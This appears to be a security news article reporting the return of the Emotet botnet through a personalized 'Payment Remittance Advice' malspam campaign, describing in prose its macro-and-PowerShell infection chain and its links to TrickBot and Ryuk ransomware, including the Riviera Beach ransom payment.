It has been all quiet on the Emotet front for the past four months, but the infamous botnet is back with a vengeance. A large-scale spam campaign has been detected that is distributing the versatile Emotet banking Trojan via malicious Word macros.
The malspam campaign was detected by researchers at Malwarebytes who identified an uptick in command and control server activity and an email campaign distributing malicious messages in English, German, Italian, and Polish. The campaign commenced on September 16 with emails claiming to be “Payment Remittance Advice” – A common ruse to get users to open malicious Word documents and enable macros to view the contents of the document.
To increase the likelihood of the emails and attachments being opened, the subject lines of the emails are personalized also include the recipient’s name – Joe Bloggs Payment Remittance Advice.
The body of the emails claim the attached document is a statement detailing a payment that is due. If the document is opened, the user is required to ‘enable content’ to accept the Microsoft license agreement, which the email claims is required to avoid Microsoft Word features being disabled.
If content is enabled, a macro will run and launch a PowerShell script which downloads the Emotet Trojan from one of a number of compromised WordPress websites. If downloaded, the Emotet Trojan will spread laterally across the network and infect multiple device. It will also hijack the user’s email account and send further spam emails to all individuals on the user’s contact list.
The Emotet banking Trojan will steal banking credentials, but it also serves as a botnet and malware downloader. The operators of the Emotet botnet are understood to have sold access to different threat groups, including the North Korea-based Lazarus Group, which is believed to be behind Ryuk ransomware.
In addition to Ryuk ransomware, Emotet is also being used to distribute the TrickBot Trojan. The three-malware combo has been dubbed the ‘triple threat’ and has been used in devastating attacks on many businesses, cities, and municipalities. It is believed to have been used to infect Riviera Beach in Florida with Ryuk ransomware. That attack resulted in widespread file encryption which disabled many services in the city. Riviera Beach officials were forced to pay a $600,000 ransom payment for the keys to unlock the encryption. According to Malwarebytes, the ransomware strain has earned at least $3.8 million in the first six months of 2019.